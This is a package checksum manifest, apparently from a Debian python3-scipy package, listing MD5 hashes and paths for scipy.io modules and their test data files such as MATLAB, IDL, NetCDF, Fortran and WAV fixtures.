abb330dcc061813b343265ce6c8cea62  usr/lib/python3/dist-packages/scipy/io/arff/tests/test_arffread.py
f199c67918ceccd12fc176cda365ed87  usr/lib/python3/dist-packages/scipy/io/harwell_boeing.py
137ef1a7537abc21f8cf4f60c1983852  usr/lib/python3/dist-packages/scipy/io/idl.py
bf2595bb18c0a25bbc0cb1f994d95c00  usr/lib/python3/dist-packages/scipy/io/matlab/__init__.py
f077546a3d4bcf8b9307221b9b208a89  usr/lib/python3/dist-packages/scipy/io/matlab/_byteordercodes.py
df1c31e6704469cc350f6af0dc4d04d7  usr/lib/python3/dist-packages/scipy/io/matlab/_mio.py
a60801d1f0318e01ea4c7f836d72cc8b  usr/lib/python3/dist-packages/scipy/io/matlab/_mio4.py
663ad251fffa720bc7b8b850b8ead4ec  usr/lib/python3/dist-packages/scipy/io/matlab/_mio5.py
968d24c79c8061097040175de987d779  usr/lib/python3/dist-packages/scipy/io/matlab/_mio5_params.py
948bb73bb5bf80e548f3735ff871c499  usr/lib/python3/dist-packages/scipy/io/matlab/_mio5_utils.cpython-312-aarch64-linux-gnu.so
9e24d3e822978aab5dd838a00f125e68  usr/lib/python3/dist-packages/scipy/io/matlab/_mio_utils.cpython-312-aarch64-linux-gnu.so
5951fe63a45e43782bd7f5113c28f8bd  usr/lib/python3/dist-packages/scipy/io/matlab/_miobase.py
a22f2eb5dd04c5e030c1d0a6cbf6079c  usr/lib/python3/dist-packages/scipy/io/matlab/_streams.cpython-312-aarch64-linux-gnu.so
1773133ce1d163a30151259cf0707e8c  usr/lib/python3/dist-packages/scipy/io/matlab/byteordercodes.py
f7becee331d0972a75b79ec96bb819c4  usr/lib/python3/dist-packages/scipy/io/matlab/mio.py
4de7869cca1afc2a476a084db6addd2b  usr/lib/python3/dist-packages/scipy/io/matlab/mio4.py
9aced3341e0d2011c05211ed4c1f212a  usr/lib/python3/dist-packages/scipy/io/matlab/mio5.py
4cec6428dbee42b0bb545e4356580eac  usr/lib/python3/dist-packages/scipy/io/matlab/mio5_params.py
5918c24b87e6a250b10b24daf7ebf2d6  usr/lib/python3/dist-packages/scipy/io/matlab/mio5_utils.py
69b3b1b6a41f01f4083afe1e6066176d  usr/lib/python3/dist-packages/scipy/io/matlab/mio_utils.py
eb97928ed0b1977f257edbedb7db8479  usr/lib/python3/dist-packages/scipy/io/matlab/miobase.py
afc3de14c78e373feea7049600e5fbd8  usr/lib/python3/dist-packages/scipy/io/matlab/streams.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/io/matlab/tests/__init__.py
f1a6d95f2a22d8f561d5250491e102a1  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/bad_miuint32.mat
45b20b025b0099f7fcd1ec63632238ed  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/bad_miutf8_array_name.mat
4743e366f5519537338932eefa03522d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/big_endian.mat
39f34627182dd07a70285b7d41d28fca  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/broken_utf8.mat
4c0df42889272fb82236b1d0f0273463  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/corrupted_zlib_checksum.mat
47d98efba8b8fc608fa703a84a92364b  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/corrupted_zlib_data.mat
9a6025b50929e468089a987c88442bb1  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/japanese_utf8.txt
b102d669f93d74de20de4245efca83f5  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/little_endian.mat
06f4f5fcba597a6649593176d5cbf30a  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/logical_sparse.mat
ec3e5ee5cf7652eae68d2db7c0e32649  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/malformed1.mat
f1f0c167a3808db3b166a81a5c1edc18  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/miuint32_for_miint32.mat
0f2866c636557b5e997f09f81929ce48  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/miutf8_array_name.mat
2f0a40a14881ceab05734a47da1b524c  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/nasty_duplicate_fieldnames.mat
0e5892ffc1ba493d871ca0b773d19796  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/one_by_zero_char.mat
1b46e05df06e509f20532545ad21786f  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/parabola.mat
9a014013315e6d0620f4d9b14042e879  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/single_empty_string.mat
97ff3f1ac480147cc819f8b7f267f4f1  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/some_functions.mat
106170e3c69e2ff0b0d60a5c2dfecd5a  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/sqr.mat
2314ac1dcffe437722fe436477409aa3  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test3dmatrix_6.1_SOL2.mat
a6148ca9a8dbfcf46e8a5854990183b2  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test3dmatrix_6.5.1_GLNX86.mat
c0ba48c21d88c9dd819380b7b48c2db2  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test3dmatrix_7.1_GLNX86.mat
e9fbc8001596e9b04253c7044553758c  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test3dmatrix_7.4_GLNX86.mat
df1b6659c00901186431d817c974bb04  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test_empty_struct.mat
fc2c16a58b994701269fa6f99a9ee3be  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test_mat4_le_floats.mat
0eb35b00475e2f45f0d76a19bb886c58  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/test_skip_variable.mat
4e0d75b4c7c21e0f33d127b980d71381  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testbool_8_WIN64.mat
3ed31445b6ec243d9638fd07d56eeefb  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcell_6.1_SOL2.mat
41f568253d81f0baaaeb7d7336135f8d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcell_6.5.1_GLNX86.mat
70834feb7934b3110651ff386f175953  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcell_7.1_GLNX86.mat
ee5906afe7d20f00521a19b719e0f94d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcell_7.4_GLNX86.mat
9951c07a5e3a39d7ad2bede48115bc8c  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcellnest_6.1_SOL2.mat
b7627dd9ce21389f1f331b241e32e220  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcellnest_6.5.1_GLNX86.mat
94ddf7a351641da66f36a36833ff3f1c  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcellnest_7.1_GLNX86.mat
052e95000643e4550f033274f7079dad  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcellnest_7.4_GLNX86.mat
0e29cb1cf6cdc44b25b4516b67363fec  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcomplex_4.2c_SOL2.mat
616a2da9c3accefcbd7bbc012607cdbe  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcomplex_6.1_SOL2.mat
98a4624804d1a413846e1ad0b0adb9b0  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcomplex_6.5.1_GLNX86.mat
abdaab886b49e4923d2094bedeeeb1a7  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcomplex_7.1_GLNX86.mat
fbe7ae8b26e26a568f48b22313649408  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testcomplex_7.4_GLNX86.mat
1d256c329d2db9bf13302f0bb97e9749  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testdouble_4.2c_SOL2.mat
9a853d58dc4b75c5a550b5085a420e94  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testdouble_6.1_SOL2.mat
4a8a7190a9b7aa009a999a5751a3435a  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testdouble_6.5.1_GLNX86.mat
216cae03c14efbf98341ef3268cc6632  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testdouble_7.1_GLNX86.mat
b4c8f2ed5ed5cef6cbd054fcacdb9d97  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testdouble_7.4_GLNX86.mat
8ffb2b00d359bfafc1d5f7ff2eeece4a  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testemptycell_5.3_SOL2.mat
d69c5d7118ae0c583cb63d594f33c2ef  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testemptycell_6.5.1_GLNX86.mat
0b52b4681e208c8e785ca74f9a4191db  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testemptycell_7.1_GLNX86.mat
a12dc4ec584c1ea8f82c3b0c07323a6c  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testemptycell_7.4_GLNX86.mat
8d1a015036071c797fe147423ec69b33  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testfunc_7.4_GLNX86.mat
e843ab70e1dc2046a0b34b3e6d3065b0  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testhdf5_7.4_GLNX86.mat
5ca2b40e541f3d635791f7953a7df9b5  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmatrix_4.2c_SOL2.mat
cc4815d2f1805bede6eeb95df9fde476  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmatrix_6.1_SOL2.mat
623784b272c264717f991603b7fcccd5  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmatrix_6.5.1_GLNX86.mat
2850a236cd5d078c74edb560150b4563  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmatrix_7.1_GLNX86.mat
9ce3845ddb4482d7c5f31545a35b9055  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmatrix_7.4_GLNX86.mat
089b254a6d6364253a851966b1c2af2c  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testminus_4.2c_SOL2.mat
0fe1996e5175bfc258328f20f7906f90  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testminus_6.1_SOL2.mat
f81d1a7656e0ef22e4ec28881e6193d9  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testminus_6.5.1_GLNX86.mat
40d152e2ce0bcd1066be6727b8348b1b  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testminus_7.1_GLNX86.mat
8b7671d144f9a4f01f31573e9fdc9f54  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testminus_7.4_GLNX86.mat
07c0fa3cea276ee5e5837c0d110a07ae  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmulti_4.2c_SOL2.mat
3dc76ce2135861c6971e6637a97e8c79  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmulti_7.1_GLNX86.mat
d815a8b3d883a877f8f0a79e01edc3e9  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testmulti_7.4_GLNX86.mat
f281dce439b8769e6c7ec904d1fc7985  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testobject_6.1_SOL2.mat
1719efc3d200cd0daa8d2cf1535b42db  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testobject_6.5.1_GLNX86.mat
b857be3fa824d802d4a74ca13e7f9d8d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testobject_7.1_GLNX86.mat
0f43b1552ecaaf279f7eb8d1194043c6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testobject_7.4_GLNX86.mat
341f295e5dde936461495dff8f731e0d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testonechar_4.2c_SOL2.mat
8358d3393152d52b50a66f50bcc77c5a  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testonechar_6.1_SOL2.mat
21569e18539aecd594f8d845ccb5fa67  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testonechar_6.5.1_GLNX86.mat
9adbddfd1b76156350f2f1385d286d45  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testonechar_7.1_GLNX86.mat
d493fd3d814c6aff907256f52d6820cc  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testonechar_7.4_GLNX86.mat
8d2245cefe96228ac6f5b93f0c379825  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testscalarcell_7.4_GLNX86.mat
c155f3bda2e34394b015f32714a7b2ac  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsimplecell.mat
6b4ff73f708bbecdc7d5fd253c1aa730  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparse_4.2c_SOL2.mat
a817a5f3e5ed6fb3e348977f7853912d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparse_6.1_SOL2.mat
b766ebabda23c26eb8ec1391650d2067  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparse_6.5.1_GLNX86.mat
f9f7c8804f72d50ce592248062d36c08  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparse_7.1_GLNX86.mat
2da58047e31d2275118a4aff77250ca9  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparse_7.4_GLNX86.mat
860909f371b6290ebab594b58abbbcb6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparsecomplex_4.2c_SOL2.mat
a1b77d0170b1e9c01ba5ba537a1241d9  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparsecomplex_6.1_SOL2.mat
f3f8027169cabbdc6c9b1312409cc901  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparsecomplex_6.5.1_GLNX86.mat
447f575a49690849451c89064bf2e524  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparsecomplex_7.1_GLNX86.mat
99ff01e350d2210aa7ee2a162cc04d42  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparsecomplex_7.4_GLNX86.mat
a8fa40e81f18595cf78280f62abb3370  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testsparsefloat_7.4_GLNX86.mat
9c7d99135b2df446cebf31a6f6f6f269  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststring_4.2c_SOL2.mat
1dde271f8c01240d654269e65a19377d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststring_6.1_SOL2.mat
09b2491aa4428d55fb4e86503df3c6c7  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststring_6.5.1_GLNX86.mat
1efb49145c6b88395c6a9fb0a1ef86e6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststring_7.1_GLNX86.mat
ad53e6bb42b0a42793e74cbbcda16656  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststring_7.4_GLNX86.mat
74bc9cf0f048cca55c7afa7990b49b52  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststringarray_4.2c_SOL2.mat
a5b0ee34e613d7f2cc2add2898d0e52e  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststringarray_6.1_SOL2.mat
a3747f568c03a4ce5b9c5fd7aa3abd3b  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststringarray_6.5.1_GLNX86.mat
a2f9c93aa9bb21591e5a2ce8e3e03c92  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststringarray_7.1_GLNX86.mat
2a0e5c19dec58b7081351ad723c6c2ac  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststringarray_7.4_GLNX86.mat
d26b77bc04aee8182022f108d8450edf  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststruct_6.1_SOL2.mat
66b964d727e838187f701933ff7d3aad  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststruct_6.5.1_GLNX86.mat
ea1f95a202969a83fc7d0b5607153ffb  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststruct_7.1_GLNX86.mat
8a5f4956174a298f0a2d794d2d298e3b  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststruct_7.4_GLNX86.mat
ab440d7ee2fb2331f4fbc11b527cd7e6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructarr_6.1_SOL2.mat
33a430050b4ae50cf2a9e62cda1f7d3d  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructarr_6.5.1_GLNX86.mat
da1d515eac7762eabc6d6c413c3bc344  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructarr_7.1_GLNX86.mat
d5b3cf5c831a1bd0563d6f8ee2040c9f  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructarr_7.4_GLNX86.mat
b71cee3e72d13d3e710bc3c026ac3120  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructnest_6.1_SOL2.mat
f8a598199d145297b7897f37f1e9eb62  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructnest_6.5.1_GLNX86.mat
1a83fb91676fe59031f47626ae885c13  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructnest_7.1_GLNX86.mat
4036c23484cd53f42be932c32b8cfe35  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/teststructnest_7.4_GLNX86.mat
9e993b286d04d61822de9c7191d2848a  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testunicode_7.1_GLNX86.mat
093a7a7c4ece5c3fc48928f4e744f2f6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testunicode_7.4_GLNX86.mat
70931ee5d06ab6e4b08206bbd638c672  usr/lib/python3/dist-packages/scipy/io/matlab/tests/data/testvec_4_GLNX86.mat
e771ad690dd01ad60b5405288a00987e  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_byteordercodes.py
c51e8b7cdd9c2147db26a2fce13ed6f6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_mio.py
a47971b3e16aba3584036213a365d894  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_mio5_utils.py
8c5b2b8914db2a7b17e0e5de6f0ce5aa  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_mio_funcs.py
c1788a73a9b28a05c58f9a8005e86da6  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_mio_utils.py
597c9e74a31b3d1454b20210ef517b50  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_miobase.py
4db011854c86a67a42236f4710fe3a97  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_pathological.py
f6370508abc743b4a2dbcd9f6e5dc821  usr/lib/python3/dist-packages/scipy/io/matlab/tests/test_streams.py
f081f7dfee670890aa20e3d5832fdbf3  usr/lib/python3/dist-packages/scipy/io/mmio.py
9b3e070fc5b3203b0a4c5355b28b675c  usr/lib/python3/dist-packages/scipy/io/netcdf.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/io/tests/__init__.py
f869bf0fd616ec4efd99a3d31f2491fa  usr/lib/python3/dist-packages/scipy/io/tests/data/Transparent Busy.ani
05711f62311b0ab224bbac8ccef768fb  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_1d.sav
d324b595b32cac3d1d1c99fb5bd44cdf  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_2d.sav
e8d83f411d40608b0f6426d1631a74ac  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_3d.sav
aca5351a601f5012317e2328976c0379  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_4d.sav
a855b97a7216c33f82c57b8d1307bb64  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_5d.sav
844f4a213635cc7c929bcbeb5139ec2a  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_6d.sav
333febd553008799af84895df06056dd  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_7d.sav
6c63255c4709f7a638d3500ee82a301c  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_8d.sav
1fdb96d0b5364ecb9018a877895ca658  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_1d.sav
7adf94d2fcbada58381073e786e63a13  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_2d.sav
3bf7efbfbbd50ee6685fc0f19c4e2e90  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_3d.sav
9d298f6d1a19ed03a3962d644afe3835  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_4d.sav
5fcbbfa35b51008a89ba723cf6b44281  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_5d.sav
9d4b9236f638e14612314baa18e449fa  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_6d.sav
9ddd5f778d55ff24c7f06474e711690e  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_7d.sav
569a6905794773f0115d26ea82f3be88  usr/lib/python3/dist-packages/scipy/io/tests/data/array_float32_pointer_8d.sav
354d888e7302c4a189b1611eb69a2129  usr/lib/python3/dist-packages/scipy/io/tests/data/example_1.nc
5e92a2abe7012fa031335971e4f13962  usr/lib/python3/dist-packages/scipy/io/tests/data/example_2.nc
80bd7f6407f1544f10e540dfbb3be6de  usr/lib/python3/dist-packages/scipy/io/tests/data/example_3_maskedvals.nc
6f4ab1f347e06b79028de1beae64763e  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-3x3d-2i.dat
08f62d3a3f3873937e94df9f30403397  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-mixed.dat
bf061ff5eeb04c97be74731531ffbd21  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-sf8-11x1x10.dat
eca0123bfafa43dc7ee0e980bf6486c1  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-sf8-15x10x22.dat
afc13b62c04a249523bea79f653bfb96  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-sf8-1x1x1.dat
b1906dda8f2b0cef8636efa19b98cf63  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-sf8-1x1x5.dat
d3aff54a229b66f22f34d40697db5df6  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-sf8-1x1x7.dat
6c2f27ed70606ba980129ffea9eb324f  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-sf8-1x3x5.dat
29673efae3ccd6ea273c76e7169834e6  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-si4-11x1x10.dat
483165d98ab487aeeeb89f1843ca9504  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-si4-15x10x22.dat
ef0aa7131e2a031986109782693b66a1  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-si4-1x1x1.dat
b469eaf5ca8a7edba3109bb6f5ceb89e  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-si4-1x1x5.dat
c9b0965de61183e68ebcf423343f716d  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-si4-1x1x7.dat
c39bcabcaab18d31bce24935bff66edd  usr/lib/python3/dist-packages/scipy/io/tests/data/fortran-si4-1x3x5.dat
0f5e2a990fc4ef5ea6eb0c9844fbb8fe  usr/lib/python3/dist-packages/scipy/io/tests/data/invalid_pointer.sav
e2fe1fef0d53e6004e38e610a8dff83b  usr/lib/python3/dist-packages/scipy/io/tests/data/null_pointer.sav
a3243f3572e766c09fdb609cb0acdbb9  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_byte.sav
60052552a930a80719d29507483c2002  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_byte_descr.sav
4668d2c792d20b84f8d1d2c49656d080  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_complex32.sav
7f8efc39f10b7714f25ee2ba7a734a42  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_complex64.sav
0cba75b742ea8867e06113286d6e90ec  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_float32.sav
7569efcf85b11b5841733d2774ecb2b2  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_float64.sav
85456f3d18496ce323b97f954d770199  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_heap_pointer.sav
1b2fef1f7fa5706d6fa2635b6882ff19  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_int16.sav
fa191acf7e939a119e9e10b40e456e4f  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_int32.sav
24453dcf2c7ef1c3ef8b371cff23adf6  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_int64.sav
b8e1a2f8441eaf5dbae72c8d1c75b773  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_string.sav
80a5baedeb36322f8ee02c41fb0403f2  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_uint16.sav
8ecf8df834f4b8c32ff92c5e5aee1fa2  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_uint32.sav
f89bcf68d422e8b7bb5ac8d9eff7d50f  usr/lib/python3/dist-packages/scipy/io/tests/data/scalar_uint64.sav
e83b23ba63c936bc7ffa28c15353552a  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_arrays.sav
afd084f45db7f05cf6393830c4d53c39  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_arrays_byte_idl80.sav
28bfba49cdea3118bb4df709cf2412a0  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_arrays_replicated.sav
db46b4872bcc0a254f5c17420e614343  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_arrays_replicated_3d.sav
15866b6abb26aec37d5ed2efefb9169a  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_inherit.sav
42185babe4d4d53e61ef03c4490f66d2  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_pointer_arrays.sav
4a785c57343201f56efb2db013acf94f  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_pointer_arrays_replicated.sav
1d074971d4af0f0a4c5f0f41fc0f165a  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_pointer_arrays_replicated_3d.sav
575ac6e60776ee12a50e2760157fc5d4  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_pointers.sav
0c8096cd05070bc6f877a175a4cc441f  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_pointers_replicated.sav
fd255b3646484b735b96e25b1e72b890  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_pointers_replicated_3d.sav
a392b892fd8ab215dccccab1e5498a6a  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_scalars.sav
792e59ff7a93767a5bdf8d2fab00d572  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_scalars_replicated.sav
16e17db067b2193c4054de99b0de6f99  usr/lib/python3/dist-packages/scipy/io/tests/data/struct_scalars_replicated_3d.sav
a8bcd60b62c17314d8d3ec00d378d31f  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-2ch-32bit-float-be.wav
393bcc2683c176e8389a69ea0a87757a  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-2ch-32bit-float-le.wav
b75116bfb47e360966a31569ae1e5689  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-be-1ch-4bytes.wav
f4ce5bbde2aa6ace42f4a660128455a9  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-le-1ch-4bytes-early-eof-no-data.wav
b33e755f2f57973e28f6676a12b40032  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-le-1ch-4bytes-early-eof.wav
8f8a3691fd56430954f7d2c9b9d093e5  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-le-1ch-4bytes-incomplete-chunk.wav
a71ffdfb93f4cf5f77d1c13833a6bbd8  usr/lib/python3/dist-packages/scipy/io/tests/data/test-44100Hz-le-1ch-4bytes.wav
338a2ce7620d20982792bede7df3d7f4  usr/lib/python3/dist-packages/scipy/io/tests/data/test-48000Hz-2ch-64bit-float-le-wavex.wav
1749e7c8716d3ce1629fb2f5e7325339  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-be-3ch-5S-24bit.wav
86416473d7e3227cc52ddb1f644fe88f  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-1ch-10S-20bit-extra.wav
08687a105c9ced94d69c749a0e603525  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-1ch-1byte-ulaw.wav
b9c946942fd6c4ccc24c3f637940d96f  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-2ch-1byteu.wav
a1082852feb93a2d5316216144ff9f5f  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-3ch-5S-24bit-inconsistent.wav
2c1ed7a050a98fc42b83d966b00160a6  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-3ch-5S-24bit.wav
8953a42d5317c9c15820a3504961ac53  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-3ch-5S-36bit.wav
13c774f2ce23f3b149411ddaa7c2d6ce  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-3ch-5S-45bit.wav
1812b09cc15d0c85ec0446f5a48429cc  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-3ch-5S-53bit.wav
87ce89a080c48bb7f5d90dfb5455be1a  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-3ch-5S-64bit.wav
00a2c342225d4e921e2e21a00e3393f8  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-4ch-9S-12bit.wav
80b06df641e06f5d4c848e341bda52b6  usr/lib/python3/dist-packages/scipy/io/tests/data/test-8000Hz-le-5ch-9S-5bit.wav
d4364d60157890cd55615b767a002594  usr/lib/python3/dist-packages/scipy/io/tests/data/various_compressed.sav
